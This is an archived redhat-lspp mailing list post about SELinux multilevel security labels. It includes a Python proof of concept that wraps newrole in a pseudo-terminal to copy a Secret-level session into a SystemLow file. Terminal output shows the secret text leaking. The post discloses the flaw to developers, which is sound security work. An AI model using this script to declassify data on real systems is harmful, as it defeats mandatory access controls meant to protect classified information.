On Thu, Jul 06, 2006 at 09:14:44AM -0700, Casey Schaufler wrote:
> --- "Knoke, Jim (US SSA)" <[EMAIL PROTECTED]>
> > On the one hand I understand how multi-level objects can complicate
> > analysis, but if we are to allow directories to contain upgraded
> > objects and devices to have ranges, it sort of sounds more consistent
> > to allow a range on any kind of object.
>
> If I put a range of Unclass to TopSecret on a file and write TopSecret
> information to it an Unclass user can read it. This fails the MLS
> requirement.
Yes, it's generally unacceptable for files, and it's an information leak
for filenames readable in directories.
In the case of devices, multilevel access is only acceptable for specific
objects that don't actually store data, such as /dev/zero, and for those
I think it's more appropriate to use the "trusted object" override to
emphasize their special status.
PTY devices are currently a problem. It's simple for a user cleared for a
range of labels to create a program that declassifies information without
needing any special privileges. For example:
- running at the low level, create a pty master/slave pair.
- on the slave end, spawn newrole to switch to a high level, send your
password through the pty.
- on the slave end, execute "cat secret_file".
- as unprivileged process, read the secret data from the pty master end
and write it to a low file.
The following program is an example, it's a wrapper for "newrole" with
builtin "typescript" capability, which isn't supposed to work without
having some type of override capability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[EMAIL PROTECTED] ~]$ id -Z
staff_u:staff_r:staff_t:SystemLow-SystemHigh
[EMAIL PROTECTED] ~]$ python newrole_typescript.py -l s2-s2 -- -c "ls -lZ
secret_file.txt; cat secret_file.txt"
Authenticating kw.
Password:
-rw-rw-r-- kw kw staff_u:object_r:staff_home_t:Secret
secret_file.txt
this is secret
[EMAIL PROTECTED] ~]$ ls -lZ typescript.txt
-rw-rw-r-- kw kw staff_u:object_r:staff_home_t:SystemLow
typescript.txt
[EMAIL PROTECTED] ~]$ cat typescript.txt
-rw-rw-r-- kw kw staff_u:object_r:staff_home_t:Secret
secret_file.txt
this is secret
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Here's the script:
#!/usr/bin/env python
import sys
import os
import pty
def copier(fd):
global copy_fd
data = os.read(fd, 65536)
copy_fd.write(data)
return data
def copying_newrole(argv):
global copy_fd
copy_fd=open('typescript.txt', 'w')
args=['newrole']
args.extend(argv)
pty.spawn(args, copier)
copy_fd.close()
if __name__ == '__main__':
copying_newrole(sys.argv[1:])
-Klaus
--
redhat-lspp mailing list
[email protected]
https://www.redhat.com/mailman/listinfo/redhat-lspp
